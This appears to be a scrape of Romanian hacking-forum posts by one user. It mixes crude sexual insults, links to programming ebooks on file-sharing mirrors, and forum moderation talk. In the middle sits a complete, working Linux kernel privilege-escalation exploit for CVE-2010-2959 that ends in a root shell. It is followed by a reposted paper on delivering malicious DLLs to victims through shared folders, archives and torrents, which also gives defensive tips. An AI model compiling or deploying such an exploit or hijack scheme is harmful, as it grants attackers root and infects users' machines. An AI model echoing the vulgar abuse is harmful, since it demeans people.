Nytro

Taci acolo ca vorbesc cu cineva caruia i-ar placea curu tau durduliu

Cum sa imi faci copii, prin tine curge sperma mea? Cum a ajuns acolo?

O fi sorusa PS: Mue TzZzapu

Din 1 octombrie vin in Bucuresti. Abia astept sa te vad amice, sa vad cat de rau poti fi. Oricum, tremur de frica, tu cred ca o sa ma mananci...

Nu cred ca are rost, nu sunt prea multi si ia ban direct pentru asa ceva.

Daca e pe bune, Ne0h asta si Dark Knight asta sunt urati rau sa moara mama. Si mai avea si figuri pe cap Ne0h ala. Il chemam la un meeting, il taiem si il mancam, zicem ca a venit Craciunu.

Copilul de Aur, Laura Vass si Susanu - Nu vreau banii tai

Salut. Se pare ca exista si oameni carora le place limba romana. Bine ai venit.

E Orange.plm.mue.com Cum nu a specicat, nu am de unde sa stiu ca nu e ca mine, deci trimit asta la gunoi

In jur de 300 de pagini. Download: http://ptgmedia.pearsoncmg.com/imprint_downloads/informit/perens/0130091154.pdf Mirror: http://www.speedyshare.com/files/24010058/0130091154.pdf

Table of Contents 1. Introduction 2. Background 2.1. History of Unix, Linux, and Open Source / Free Software 2.1.1. Unix 2.1.2. Free Software Foundation 2.1.3. Linux 2.1.4. Open Source / Free Software 2.1.5. Comparing Linux and Unix 2.2. Security Principles 2.3. Why do Programmers Write Insecure Code? 2.4. Is Open Source Good for Security? 2.4.1. View of Various Experts 2.4.2. Why Closing the Source Doesn't Halt Attacks 2.4.3. Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away 2.4.4. How OSS/FS Counters Trojan Horses 2.4.5. Other Advantages 2.4.6. Bottom Line 2.5. Types of Secure Programs 2.6. Paranoia is a Virtue 2.7. Why Did I Write This Document? 2.8. Sources of Design and Implementation Guidelines 2.9. Other Sources of Security Information 2.10. Document Conventions 3. Summary of Linux and Unix Security Features 3.1. Processes 3.1.1. Process Attributes 3.1.2. POSIX Capabilities 3.1.3. Process Creation and Manipulation 3.2. Files 3.2.1. Filesystem Object Attributes 3.2.2. Creation Time Initial Values 3.2.3. Changing Access Control Attributes 3.2.4. Using Access Control Attributes 3.2.5. Filesystem Hierarchy 3.3. System V IPC 3.4. Sockets and Network Connections 3.5. Signals 3.6. Quotas and Limits 3.7. Dynamically Linked Libraries 3.8. Audit 3.9. PAM 3.10. Specialized Security Extensions for Unix-like Systems 4. Security Requirements 4.1. Common Criteria Introduction 4.2. Security Environment and Objectives 4.3. Security Functionality Requirements 4.4. Security Assurance Measure Requirements 5. Validate All Input 5.1. Command line 5.2. Environment Variables 5.2.1. Some Environment Variables are Dangerous 5.2.2. Environment Variable Storage Format is Dangerous 5.2.3. The Solution - Extract and Erase 5.2.4. Don't Let Users Set Their Own Environment Variables 5.3. File Descriptors 5.4. File Names 5.5. File Contents 5.6. Web-Based Application Inputs (Especially CGI Scripts) 5.7. Other Inputs 5.8. Human Language (Locale) Selection 5.8.1. How Locales are Selected 5.8.2. Locale Support Mechanisms 5.8.3. Legal Values 5.8.4. Bottom Line 5.9. Character Encoding 5.9.1. Introduction to Character Encoding 5.9.2. Introduction to UTF-8 5.9.3. UTF-8 Security Issues 5.9.4. UTF-8 Legal Values 5.9.5. UTF-8 Related Issues 5.10. Prevent Cross-site Malicious Content on Input 5.11. Filter HTML/URIs That May Be Re-presented 5.11.1. Remove or Forbid Some HTML Data 5.11.2. Encoding HTML Data 5.11.3. Validating HTML Data 5.11.4. Validating Hypertext Links (URIs/URLs) 5.11.5. Other HTML tags 5.11.6. Related Issues 5.12. Forbid HTTP GET To Perform Non-Queries 5.13. Counter SPAM 5.14. Limit Valid Input Time and Load Level 6. Avoid Buffer Overflow 6.1. Dangers in C/C++ 6.2. Library Solutions in C/C++ 6.2.1. Standard C Library Solution 6.2.2. Static and Dynamically Allocated Buffers 6.2.3. strlcpy and strlcat 6.2.4. libmib 6.2.5. C++ std::string class 6.2.6. Libsafe 6.2.7. Other Libraries 6.3. Compilation Solutions in C/C++ 6.4. Other Languages 7. Structure Program Internals and Approach 7.1. Follow Good Software Engineering Principles for Secure Programs 7.2. Secure the Interface 7.3. Separate Data and Control 7.4. Minimize Privileges 7.4.1. Minimize the Privileges Granted 7.4.2. Minimize the Time the Privilege Can Be Used 7.4.3. Minimize the Time the Privilege is Active 7.4.4. Minimize the Modules Granted the Privilege 7.4.5. Consider Using FSUID To Limit Privileges 7.4.6. Consider Using Chroot to Minimize Available Files 7.4.7. Consider Minimizing the Accessible Data 7.4.8. Consider Minimizing the Resources Available 7.5. Minimize the Functionality of a Component 7.6. Avoid Creating Setuid/Setgid Scripts 7.7. Configure Safely and Use Safe Defaults 7.8. Load Initialization Values Safely 7.9. Fail Safe 7.10. Avoid Race Conditions 7.10.1. Sequencing (Non-Atomic) Problems 7.10.1.1. Atomic Actions in the Filesystem 7.10.1.2. Temporary Files 7.10.2. Locking 7.10.2.1. Using Files as Locks 7.10.2.2. Other Approaches to Locking 7.11. Trust Only Trustworthy Channels 7.12. Set up a Trusted Path 7.13. Use Internal Consistency-Checking Code 7.14. Self-limit Resources 7.15. Prevent Cross-Site (XSS) Malicious Content 7.15.1. Explanation of the Problem 7.15.2. Solutions to Cross-Site Malicious Content 7.15.2.1. Identifying Special Characters 7.15.2.2. Filtering 7.15.2.3. Encoding (Quoting) 7.16. Foil Semantic Attacks 7.17. Be Careful with Data Types 8. Carefully Call Out to Other Resources 8.1. Call Only Safe Library Routines 8.2. Limit Call-outs to Valid Values 8.3. Handle Metacharacters 8.4. Call Only Interfaces Intended for Programmers 8.5. Check All System Call Returns 8.6. Avoid Using vfork(2) 8.7. Counter Web Bugs When Retrieving Embedded Content 8.8. Hide Sensitive Information 9. Send Information Back Judiciously 9.1. Minimize Feedback 9.2. Don't Include Comments 9.3. Handle Full/Unresponsive Output 9.4. Control Data Formatting (Format Strings/Formatation) 9.5. Control Character Encoding in Output 9.6. Prevent Include/Configuration File Access 10. Language-Specific Issues 10.1. C/C++ 10.2. Perl 10.3. Python 10.4. Shell Scripting Languages (sh and csh Derivatives) 10.5. Ada 10.6. Java 10.7. Tcl 10.8. PHP 11. Special Topics 11.1. Passwords 11.2. Authenticating on the Web 11.2.1. Authenticating on the Web: Logging In 11.2.2. Authenticating on the Web: Subsequent Actions 11.2.3. Authenticating on the Web: Logging Out 11.3. Random Numbers 11.4. Specially Protect Secrets (Passwords and Keys) in User Memory 11.5. Cryptographic Algorithms and Protocols 11.5.1. Cryptographic Protocols 11.5.2. Symmetric Key Encryption Algorithms 11.5.3. Public Key Algorithms 11.5.4. Cryptographic Hash Algorithms 11.5.5. Integrity Checking 11.5.6. Randomized Message Authentication Mode (RMAC) 11.5.7. Other Cryptographic Issues 11.6. Using PAM 11.7. Tools 11.8. Windows CE 11.9. Write Audit Records 11.10. Physical Emissions 11.11. Miscellaneous 12. Conclusion 13. Bibliography A. History B. Acknowledgements C. About the Documentation License D. GNU Free Documentation License E. Endorsements F. About the Author List of Tables 5-1. Legal UTF-8 Sequences List of Figures 1-1. Abstract View of a Program Aici: http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO.html

Carti: an-introduction-of-java-programming.pdf an-introduction-to-java-programming-2.pdf an-introduction-to-java-programming-3.pdf object-oriented-programming-using-java.pdf Download: http://www.mediafire.com/?48e44rayfjjgsyh http://www.speedyshare.com/files/24009733/object-oriented-programming-using-java.pdf.rar

Continut: Front Matter and Table of Contents http://www.advancedlinuxprogramming.com/alp-folder/alp-toc.pdf Chapter 01 - Advanced Unix Programming with Linux http://www.advancedlinuxprogramming.com/alp-folder/alp-ch01-advanced-unix-programming-with-linux.pdf Chapter 02 - Writing Good GNU/Linux Software http://www.advancedlinuxprogramming.com/alp-folder/alp-ch02-writing-good-gnu-linux-software.pdf Chapter 03 - Processes http://www.advancedlinuxprogramming.com/alp-folder/alp-ch03-processes.pdf Chapter 04 - Threads http://www.advancedlinuxprogramming.com/alp-folder/alp-ch04-threads.pdf Chapter 05 - Interprocess Communication http://www.advancedlinuxprogramming.com/alp-folder/alp-ch05-ipc.pdf Chapter 06 - Mastering Linux http://www.advancedlinuxprogramming.com/alp-folder/alp-ch06-mastering-linux.pdf Chapter 07 - The /proc File System http://www.advancedlinuxprogramming.com/alp-folder/alp-ch07-proc-filesystem.pdf Chapter 08 - Linux System Calls http://www.advancedlinuxprogramming.com/alp-folder/alp-ch08-linux-system-calls.pdf Chapter 09 - Inline Assembly Code http://www.advancedlinuxprogramming.com/alp-folder/alp-ch09-inline-asm.pdf Chapter 10 - Security http://www.advancedlinuxprogramming.com/alp-folder/alp-ch10-security.pdf Chapter 11 - A Sample GNU/Linux Application http://www.advancedlinuxprogramming.com/alp-folder/alp-ch11-sample-application.pdf Appendix A - Other Development Tools http://www.advancedlinuxprogramming.com/alp-folder/alp-apA-other-development-tools.pdf Appendix B - Low Level I/O http://www.advancedlinuxprogramming.com/alp-folder/alp-apB-low-level-io.pdf Appendix C - Table of Signals http://www.advancedlinuxprogramming.com/alp-folder/alp-apC-signal-table.pdf Appendix D - Online Resources http://www.advancedlinuxprogramming.com/alp-folder/alp-apD-online-resources.pdf Appendix E - Open Publication License Version 1.0 http://www.advancedlinuxprogramming.com/alp-folder/alp-apE-open-publication-license.pdf Appendix F - The GNU General Public License http://www.advancedlinuxprogramming.com/alp-folder/alp-apF-gnu-public-license.pdf Index http://www.advancedlinuxprogramming.com/alp-folder/alp-index.pdf

E-Books: artificial-intelligence-agent-behaviour-i.pdf artificial-intelligence-agents-and-environments.pdf artificial-intelligence-exercises-ii.pdf artificial-intelligence-exercises-i.pdf Download: http://www.mediafire.com/?7mnganp5eg36gt0 http://www.speedyshare.com/files/24009617/artificial-intelligence.rar

Preview: http://i38.tinypic.com/33epzbs.png Download: http://www.mediafire.com/?xh8r3w7vsewb812 http://www.speedyshare.com/files/24009517/c-programming-in-linux.pdf

Mersi. O sa mai fie cate ceva

Il mai incearca cineva? Nu merge la mine, "Symbol table not available, aborting". /* * i-CAN-haz-MODHARDEN.c * * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 * * Ben Hawkes discovered an integer overflow in the Controller Area Network * (CAN) subsystem when setting up frame content and filtering certain * messages. An attacker could send specially crafted CAN traffic to crash * the system or gain root privileges. * * Usage: * * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden * $ ./i-can-haz-modharden * ... * [+] launching root shell! * # id * uid=0(root) gid=0(root) * * Notes: * * The allocation pattern of the CAN BCM module gives us some desirable * properties for smashing the SLUB. We control the kmalloc with a 16-byte * granularity allowing us to place our allocation in the SLUB cache of our * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for * old-times sake). The allocation can also be made in its own discrete * stage before the overwrite which allows us to be a bit more conservative * in ensuring the proper layout of our SLUB cache. * * To exploit the vulnerability, we first create a BCM RX op with a crafted * nframes to trigger the integer overflow during the kmalloc. On the second * call to update the existing RX op, we bypass the E2BIG check since the * stored nframes in the op is large, yet has an insufficiently sized * allocation associated with it. We then have a controlled write into the * adjacent shmid_kernel object in the 96-byte SLUB cache. * * However, while we control the length of the SLUB overwrite via a * memcpy_fromiovec operation, there exists a memset operation that directly * follows which zeros out last_frames, likely an adjacent allocation, with * the same malformed length, effectively nullifying our shmid smash. To * work around this, we take advantage of the fact that copy_from_user can * perform partial writes on x86 and trigger an EFAULT by setting up a * truncated memory mapping as the source for the memcpy_fromiovec operation, * allowing us to smash the necessary amount of memory and then pop out and * return early before the memset operation occurs. * * We then perform a dry-run and detect the shmid smash via an EIDRM errno * from shmat() caused by an invalid ipc_perm sequence number. Once we're * sure we have a shmid_kernel under our control we re-smash it with the * malformed version and redirect control flow to our credential modifying * calls mapped in user space. * * Distros: please use grsecurity's MODHARDEN or SELinux's module_request * to restrict unprivileged loading of uncommon packet families. Allowing * the loading of poorly-written PF modules just adds a non-trivial and * unnecessary attack surface to the kernel. * * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports * easily to other vulnerable kernels/distros. Careful, it could use some * post-exploitation stability love as well. * * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that * this exploit borrows code from. */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h> #define SLUB "kmalloc-96" #define ALLOCATION 96 #define FILLER 100 #ifndef PF_CAN #define PF_CAN 29 #endif #ifndef CAN_BCM #define CAN_BCM 2 #endif struct sockaddr_can { sa_family_t can_family; int can_ifindex; union { struct { uint32_t rx_id, tx_id; } tp; } can_addr; }; struct can_frame { uint32_t can_id; uint8_t can_dlc; uint8_t data[8] __attribute__((aligned(8))); }; struct bcm_msg_head { uint32_t opcode; uint32_t flags; uint32_t count; struct timeval ival1, ival2; uint32_t can_id; uint32_t nframes; struct can_frame frames[0]; }; #define RX_SETUP 5 #define RX_DELETE 6 #define CFSIZ sizeof(struct can_frame) #define MHSIZ sizeof(struct bcm_msg_head) #define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8 struct list_head { struct list_head *next; struct list_head *prev; }; struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; } super_block; struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; }; struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; } inode; struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; } dentry; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; } op; struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; } vfsmount; struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; } file; struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; }; struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; } shmid_kernel; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %s\n", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int check_slabinfo(char *cache, int *active_out, int *total_out) { FILE *fp; char name[64], slab[256]; int active, total, diff; memset(slab, 0, sizeof(slab)); memset(name, 0, sizeof(name)); fp = fopen("/proc/slabinfo", "r"); if (!fp) { printf("[-] sorry, /proc/slabinfo is not available!"); exit(1); } fgets(slab, sizeof(slab) - 1, fp); while (1) { fgets(slab, sizeof(slab) - 1, fp); sscanf(slab, "%s %u %u", name, &active, &total); diff = total - active; if (strcmp(name, cache) == 0) { break; } } fclose(fp); if (active_out) { *active_out = active; } if (total_out) { *total_out = total; } return diff; } void trigger(void) { int *shmids; int i, ret, sock, cnt, base, smashed; int diff, active, total, active_new, total_new; int len, sock_len, mmap_len; struct sockaddr_can addr; struct bcm_msg_head *msg; void *efault; char *buf; printf("[+] creating PF_CAN socket...\n"); sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); if (sock < 0) { printf("[-] kernel lacks CAN packet family support\n"); exit(1); } printf("[+] connecting PF_CAN socket...\n"); memset(&addr, 0, sizeof(addr)); addr.can_family = PF_CAN; ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); if (sock < 0) { printf("[-] could not connect CAN socket\n"); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959; msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1; printf("[+] clearing out any active OPs via RX_DELETE...\n"); msg->opcode = RX_DELETE; ret = send(sock, msg, len, 0); printf("[+] removing any active user-owned shmids...\n"); system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;"); printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n"); diff = check_slabinfo(SLUB, &active, &total); shmids = malloc(sizeof(int) * diff * 10); cnt = diff * 10; for (i = 0; i < cnt; ++i) { diff = check_slabinfo(SLUB, &active, &total); if (diff == 0) { break; } shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } base = i; if (diff != 0) { printf("[-] inconsistency detected with SLUB cache allocation, please try again\n"); exit(1); } printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n"); i = base; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP; ret = send(sock, msg, len, 0); if (ret < 0) { printf("[-] kernel rejected malformed CAN header\n"); exit(1); } i = base + FILLER; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n"); mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3); sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4); efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault); printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n"); msg = (struct bcm_msg_head *) efault; memset(msg, 0, mmap_len); msg->can_id = 2959; msg->nframes = (ALLOCATION / 16) * 4; msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!\n"); exit(1); } printf("[+] seeking out the smashed shmid_kernel...\n"); i = base; cnt = i + FILLER + FILLER; for (; i < cnt; ++i) { ret = (int) shmat(shmids[i], NULL, SHM_RDONLY); if (ret == -1 && errno == EIDRM) { smashed = i; break; } } if (i == cnt) { printf("[-] could not find smashed shmid, trying running the exploit again!\n"); exit(1); } printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]); printf("[+] re-smashing the shmid_kernel with exploit payload...\n"); shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI; buf = (char *) msg; memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); msg->opcode = RX_SETUP; ret = send(sock, msg, mmap_len, 0); if (ret != -1 && errno != EFAULT) { printf("[-] couldn't trigger EFAULT, exploit aborting!\n"); exit(1); } ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0); printf("[+] launching root shell!\n"); execl("/bin/bash", "/bin/bash", NULL); exit(0); } printf("[-] exploit failed! retry?\n"); } void setup(void) { printf("[+] looking for symbols...\n"); commit_creds = (_commit_creds) get_symbol("commit_creds"); if (!commit_creds) { printf("[-] symbol table not availabe, aborting!\n"); } prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] symbol table not availabe, aborting!\n"); } printf("[+] setting up exploit payload...\n"); super_block.s_flags = 0; inode.i_size = 4096; inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1; dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode; op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code; vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1; file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op; shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = getuid(); shmid_kernel.shm_perm.gid = getgid(); shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; } int main(int argc, char **argv) { setup(); trigger(); return 0; } nytro@rst:~> uname -a Linux rst 2.6.34-12-default #1 SMP 2010-06-29 02:39:08 +0200 i686 i686 i386 GNU/Linux http://www.exploit-db.com/exploits/14814/

Faci cum iti e mai usor. Da, poti sa pui calea, asa cred ca ar fi cel mai bine. Eventual sa mai pui si un mirror sau doua. Si versiunea programului curent o salvezi intr-un fisier, sa nu te complici...

AlStar: Nu poti intra pe forum. Iti apare doar mesajul ca "You are banned" si motivul. La warn-urile mele, motivul e "Warns", adica avertismentele sunt de vina. Da, banurile nu expira niciodata, cu mult timp in urma expirau. Dar am intervenit eu

# Visit Exploiting DLL Hijack in the real world to see a html version of this paper # ---------------------------------------------------------------------------- # Title: Exploiting DLL Hijack in the real world # Date: 27/08/2010 # Author: Bruno Filipe (diwr) - bmilreu[]at[]gmail.com # ---------------------------------------------------------------------------- Dll hijacking is the new hype on Windows exploiting. This vulnerability is caused by a misbehavior practiced by all versions of Windows, as far as I’m concerned. This misbehavior can be found explained in this MSDN page <link at bottom> (see Remarks). Note that many people consider this flaw a feature and not a real bug because it was intended to be made this way by Microsoft. I strongly disagree as I can’t think of a single legitimate usage of a dll being loaded from the same directory of a opened file. I won’t go into minor details about this issue, as they can be found in reference links at the bottom of this article. I recommend reading them first if you don’t know what Dll Hijacking is. Basically, it works by creating a custom malicious dll and putting it in the same directory of a clean file. When this clean file is opened by a vulnerable application, your custom dll will be loaded and your code executed. This malicious dll must have specific filenames for each vulnerable application, which can be discovered using any simple debugging tool. There are vulnerabilities in many major programs, so it’s possible to bundle a dll with almost any filetype, like pdf, html, jpg, mp3, avi, ANYTHING. Even some programs included with Windows are vulnerable. Peter Eeckhoute from corelan team started an unofficial list that you might want to check <link at bottom>. You’re almost certainly using many exploitable applications so it’s a must to check there if you use Windows regardless of it’s version or edition. This is a major security issue that affects every Windows version and cannot be patched universally as it would break many existing applications. Inside this article I’ll also provide some tips about how you can try to protect yourself and your network. There’s no bullet-proof solution at this moment but you can certainly avoid getting exploited in many cases. This article is focused on showing how this flaw can be exploited in a real world scenario from an attacker’s side. This is important because there are many possible attack vectors that can be used either making use of another vulnerability or even some simple social engineering. I’ll explain some of them and how can be possibly avoided by an user or sysadmin. * Using a SMB/WebDav shared folder This is perhaps the most common way dll hijacking is being used, probably because it can be exploited remotely. There are already a module for Metasploit which uses this vector. It works by putting together a malicious dll and a clean file that triggers it inside a share and then making your target open this clean file. Remember a shared folder link always starts with double slashes like \\123.45.67.890. Real world examples: 1. Attacker sends a shared folder link to a victim. Victim opens and sees some .html files and double-clicks one of them. When a vulnerable browser or application opens this file it loads a dll directly from this share, and victim is now infected. 2. Attacker posts a link in a forum that looks like a http link but redirects victim to a shared folder. Victim opens a simple .pdf file and gets infected. 3. Attacker gains access to a trusty website and puts iframes or redirects to his share. Victim trusts this site and opens a mp3 file inside the shared folder and… gets infected as well. 4. Attacker uses the .lnk bug or any browser vulnerability together with any of above examples and thus increase his infect rate. Tip: This kind of attack can be neutralized blocking any outbound connection to a smb/webdav share. Ports are 445 and 135. * A compressed package (.zip, .tar.gz, .rar etc) This vector can be exploited by putting together a bunch of clean files and a malicious dll inside a compressed folder/package. Target will extract these files and open one of them, getting attacker’s dll loaded. Real world example: 1. Attacker compresses 30 jpg pictures and a dll in a zip file. Victim extracts everything to a folder and double-clicks one of the pictures. Infected. I won’t provide any other example of this because it’d look the same. Tip: Before opening any kind of file, specially downloaded from the internet, check if there’s any dll file in the same directory. Don’t forget to enable show hidden files and show all extensions on your Folder Options. It’s also recommended to move only the files you need to open to another directory created by you. This should make you safe. * Torrents This one is kinda nasty and can be very effective to contaminate large amounts of people. A torrent can contain large numbers of files and can be used to get a malicious dll downloaded together with clean files without being noticed. This is very dangerous, specially if a big torrent tracker or database can be compromised. Real world examples: 1. Attacker posts a custom torrent in a public tracker, which contains a pack of mp3?s and a malicious dll. Victim goes listen it’s new song album and get infected. 2. Attacker gains admin access to a torrent database (this actually happened to ThePirateBay not so long ago) and changes a legitimate high-traffic torrent for a infected one. This could cause a massive infection in a matter of minutes. Tip: Same tip as above. Make sure there are no dlls in the current folder before opening any kind of file. If you own a tracker or database make sure your webserver and/or database are not vulnerable to any kind of vulnerability like SQL injections, XSS etc. * Exploiting multiple application hijacks We have not seen yet a real world malware that uses dll hijacks to it’s max but one of the ways attackers can (and will) use to increase their success rate is putting multiple dlls to exploit the same filetype. Real world example: * Attacker shares a folder which contains a bunch of .avi files and three malicious dlls: one for VLC, other for MediaPlayer Classic and, finally, the last one for Winamp. Attacker can now exploit three apps in the same attack, increasing the chance of victim getting infected. These are just some of the many ways we might seem this breach being exploited in real world in a very near future. You might wanna check all vulnerable apps and discover your own way or you can also try to discover your own vulnerable apps using this kit, provided by HD Moore (creator of Metasploit) <link at bottom>. - Bruno Filipe (diwr) Links: [MSDN page] SetDllDirectory Function (Windows) [hdm’s DLL Hijack Audition kit and instructions] Metasploit: Better, Faster, Stronger: DLLHijackAuditKit v2 [Rapid7 Blog advisory about DLL Hijacking flaw] Application DLL Load Hijacking Rapid7 Network Security Blog [Corelan blog – Unofficial list of vulnerable apps] http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/ [exploit-db list of vulnerable apps] DLL Hijacking – Vulnerable Applications [sample DreamWeaver CS5 exploit] Adobe Dreamweaver CS5 <= 11.0 build 4909 DLL Hijacking Exploit (mfc90loc.dll)

Depinde cat de mult vrei sa te complici. Poti face o alta aplicatie sau aceeasi aplicatie, update-ul depinde de ceea ce descarci. Sa verifici daca e o versiune noua e usor, faci un fisier XML banal sau orice fisier in care, atunci cand faci o noua versiune, treci noua versiune, iar aplicatia responsabila cu update-ul verifica daca versiunea curenta e mai veche. Apoi, descarci noua aplicatie. Ar fi bine sa faci un mic installer, care sa verifice daca programul curent ruleaza,c e versiune este, si ce ar fi de modificat: pot fi de modificat DLL-uri sau alte imagini sau prostii care pot fi deschise de program, ideala ar fi inchiderea programului care trebuie updatat, ori sa se inchida singur, ori updater-ul sa il inchida.

Exemplu de post care a primit avertisment (warn) si cum mai erau si altele, a devenit ban

RAR Password Cracker - Recovery (crack) of lost RAR/WinRAR passwords ?

